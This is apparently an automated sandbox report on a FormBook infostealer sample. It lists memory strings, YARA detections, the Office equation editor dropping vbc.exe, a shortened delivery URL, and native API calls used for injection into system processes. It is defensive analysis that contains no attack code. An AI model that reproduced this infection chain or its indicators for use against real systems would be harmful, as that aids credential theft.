Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2193837083.00000000039F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000007.00000000.2205909472.000000000839A000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2194004284.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: e9yj[1].htm.0.dr	String found in binary or memory: http://xy2.eu/?redirect=e9yj
Source: e9yj.url.0.dr	String found in binary or memory: http://xy2.eu/e9yj
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: explorer.exe, 00000007.00000000.2206376582.000000000856E000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: explorer.exe, 00000007.00000000.2205909472.000000000839A000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: explorer.exe, 00000007.00000000.2206072148.0000000008471000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
Source: explorer.exe, 00000007.00000000.2206728525.000000000861C000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1y
Source: vbc.exe, 00000005.00000002.2185034993.0000000002256000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000008.00000002.2443394630.00000000003C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.2215103438.000000000293F000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2443316419.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2185257430.0000000003239000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2442286951.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2224718389.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.2183018548.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2224969781.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2224913904.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2185374644.000000000333A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 6.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000008.00000002.2443394630.00000000003C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2443394630.00000000003C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.2215103438.000000000293F000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.2215103438.000000000293F000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2443316419.0000000000230000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2443316419.0000000000230000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2185257430.0000000003239000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2185257430.0000000003239000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2442286951.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2442286951.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2224718389.00000000000F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2224718389.00000000000F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.2183018548.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.2183018548.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2224969781.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2224969781.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2224913904.00000000002F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2224913904.00000000002F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2185374644.000000000333A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2185374644.000000000333A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 6_2_00419D60 NtCreateFile,	6_2_00419D60
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00419E10 NtReadFile,	6_2_00419E10
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00419E90 NtClose,	6_2_00419E90
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00419F40 NtAllocateVirtualMemory,	6_2_00419F40
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00419D5A NtCreateFile,	6_2_00419D5A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00419E0A NtReadFile,	6_2_00419E0A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A000C4 NtCreateFile,LdrInitializeThunk,	6_2_00A000C4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A00078 NtResumeThread,LdrInitializeThunk,	6_2_00A00078
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A00048 NtProtectVirtualMemory,LdrInitializeThunk,	6_2_00A00048
Source: C:\Users\Public\vbc.exe	Code function: 6_2_009FF9F0 NtClose,LdrInitializeThunk,	6_2_009FF9F0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_009FF900 NtReadFile,LdrInitializeThunk,	6_2_009FF900
Source: C:\Users\Public\vbc.exe	Code function: 6_2_009FFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_009FFAD0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_009FFAE8 NtQueryInformationProcess,LdrInitializeThunk,	6_2_009FFAE8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_009FFBB8 NtQueryInformationToken,LdrInitializeThunk,	6_2_009FFBB8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_009FFB68 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_009FFB68
Source: C:\Users\Public\vbc.exe	Code function: 6_2_009FFC90 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_009FFC90
Source: C:\Users\Public\vbc.exe	Code function: 6_2_009FFC60 NtMapViewOfSection,LdrInitializeThunk,	6_2_009FFC60
Source: C:\Users\Public\vbc.exe	Code function: 6_2_009FFD8C NtDelayExecution,LdrInitializeThunk,	6_2_009FFD8C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_009FFDC0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_009FFDC0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_009FFEA0 NtReadVirtualMemory,LdrInitializeThunk,	6_2_009FFEA0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_009FFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	6_2_009FFED0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_009FFFB4 NtCreateSection,LdrInitializeThunk,	6_2_009FFFB4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A010D0 NtOpenProcessToken,	6_2_00A010D0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A00060 NtQuerySection,	6_2_00A00060
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A001D4 NtSetValueKey,	6_2_00A001D4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A0010C NtOpenDirectoryObject,	6_2_00A0010C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A01148 NtOpenThread,	6_2_00A01148
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A007AC NtCreateMutant,	6_2_00A007AC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_009FF8CC NtWaitForSingleObject,	6_2_009FF8CC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A01930 NtSetContextThread,	6_2_00A01930
Source: C:\Users\Public\vbc.exe	Code function: 6_2_009FF938 NtWriteFile,	6_2_009FF938
Source: C:\Users\Public\vbc.exe	Code function: 6_2_009FFAB8 NtQueryValueKey,	6_2_009FFAB8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_009FFA20 NtQueryInformationFile,	6_2_009FFA20
Source: C:\Users\Public\vbc.exe	Code function: 6_2_009FFA50 NtEnumerateValueKey,	6_2_009FFA50
Source: C:\Users\Public\vbc.exe	Code function: 6_2_009FFBE8 NtQueryVirtualMemory,	6_2_009FFBE8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_009FFB50 NtCreateKey,	6_2_009FFB50
Source: C:\Users\Public\vbc.exe	Code function: 6_2_009FFC30 NtOpenProcess,	6_2_009FFC30
Source: C:\Users\Public\vbc.exe	Code function: 6_2_009FFC48 NtSetInformationFile,	6_2_009FFC48
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A00C40 NtGetContextThread,	6_2_00A00C40
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A01D80 NtSuspendThread,	6_2_00A01D80
Source: C:\Users\Public\vbc.exe	Code function: 6_2_009FFD5C NtEnumerateKey,	6_2_009FFD5C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_009FFE24 NtWriteVirtualMemory,	6_2_009FFE24
Source: C:\Users\Public\vbc.exe	Code function: 6_2_009FFFFC NtCreateProcessEx,	6_2_009FFFFC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F200C4 NtCreateFile,LdrInitializeThunk,	8_2_01F200C4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F207AC NtCreateMutant,LdrInitializeThunk,	8_2_01F207AC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F1F9F0 NtClose,LdrInitializeThunk,	8_2_01F1F9F0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F1F900 NtReadFile,LdrInitializeThunk,	8_2_01F1F900
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F1FBB8 NtQueryInformationToken,LdrInitializeThunk,	8_2_01F1FBB8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F1FB68 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_01F1FB68
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F1FB50 NtCreateKey,LdrInitializeThunk,	8_2_01F1FB50
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F1FAE8 NtQueryInformationProcess,LdrInitializeThunk,	8_2_01F1FAE8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F1FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	8_2_01F1FAD0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F1FAB8 NtQueryValueKey,LdrInitializeThunk,	8_2_01F1FAB8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F1FDC0 NtQuerySystemInformation,LdrInitializeThunk,	8_2_01F1FDC0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F1FD8C NtDelayExecution,LdrInitializeThunk,	8_2_01F1FD8C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F1FC60 NtMapViewOfSection,LdrInitializeThunk,	8_2_01F1FC60
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F1FFB4 NtCreateSection,LdrInitializeThunk,	8_2_01F1FFB4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F1FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	8_2_01F1FED0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F201D4 NtSetValueKey,	8_2_01F201D4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F21148 NtOpenThread,	8_2_01F21148
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F2010C NtOpenDirectoryObject,	8_2_01F2010C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F210D0 NtOpenProcessToken,	8_2_01F210D0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F20078 NtResumeThread,	8_2_01F20078
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F20060 NtQuerySection,	8_2_01F20060
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F20048 NtProtectVirtualMemory,	8_2_01F20048
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F21930 NtSetContextThread,	8_2_01F21930
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F1F938 NtWriteFile,	8_2_01F1F938
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F1F8CC NtWaitForSingleObject,	8_2_01F1F8CC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F1FBE8 NtQueryVirtualMemory,	8_2_01F1FBE8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F1FA50 NtEnumerateValueKey,	8_2_01F1FA50
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F1FA20 NtQueryInformationFile,	8_2_01F1FA20
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F21D80 NtSuspendThread,	8_2_01F21D80
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F1FD5C NtEnumerateKey,	8_2_01F1FD5C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F1FC90 NtUnmapViewOfSection,	8_2_01F1FC90
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F20C40 NtGetContextThread,	8_2_01F20C40
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F1FC48 NtSetInformationFile,	8_2_01F1FC48
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F1FC30 NtOpenProcess,	8_2_01F1FC30
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F1FFFC NtCreateProcessEx,	8_2_01F1FFFC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F1FF34 NtQueueApcThread,	8_2_01F1FF34
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F1FEA0 NtReadVirtualMemory,	8_2_01F1FEA0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F1FE24 NtWriteVirtualMemory,	8_2_01F1FE24
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_00099D60 NtCreateFile,	8_2_00099D60
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_00099E10 NtReadFile,	8_2_00099E10
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_00099E90 NtClose,	8_2_00099E90
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_00099F40 NtAllocateVirtualMemory,	8_2_00099F40
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_00099D5A NtCreateFile,	8_2_00099D5A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_00099E0A NtReadFile,	8_2_00099E0A

Source: C:\Users\Public\vbc.exe	Code function: 5_2_002E41FF	5_2_002E41FF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_002E4210	5_2_002E4210
Source: C:\Users\Public\vbc.exe	Code function: 5_2_002EC420	5_2_002EC420
Source: C:\Users\Public\vbc.exe	Code function: 5_2_002EC412	5_2_002EC412
Source: C:\Users\Public\vbc.exe	Code function: 5_2_002E4480	5_2_002E4480
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00BD8099	5_2_00BD8099
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00BD6250	5_2_00BD6250
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00BD8C80	5_2_00BD8C80
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00BD94E0	5_2_00BD94E0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00BDAD58	5_2_00BDAD58
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00BD9EF9	5_2_00BD9EF9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00BDD0C8	5_2_00BDD0C8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00BD0006	5_2_00BD0006
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00BD0048	5_2_00BD0048
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00BD9970	5_2_00BD9970
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00BD6240	5_2_00BD6240
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00BD8BD9	5_2_00BD8BD9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00BDD340	5_2_00BDD340
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00BDBC80	5_2_00BDBC80
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00BD7CE2	5_2_00BD7CE2
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00BDCE90	5_2_00BDCE90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_04313C00	5_2_04313C00
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0431828F	5_2_0431828F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_04312430	5_2_04312430
Source: C:\Users\Public\vbc.exe	Code function: 5_2_04310007	5_2_04310007
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0431500F	5_2_0431500F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_04315C51	5_2_04315C51
Source: C:\Users\Public\vbc.exe	Code function: 5_2_04310048	5_2_04310048
Source: C:\Users\Public\vbc.exe	Code function: 5_2_043138E0	5_2_043138E0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_043140D0	5_2_043140D0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_043149BD	5_2_043149BD
Source: C:\Users\Public\vbc.exe	Code function: 5_2_04315638	5_2_04315638
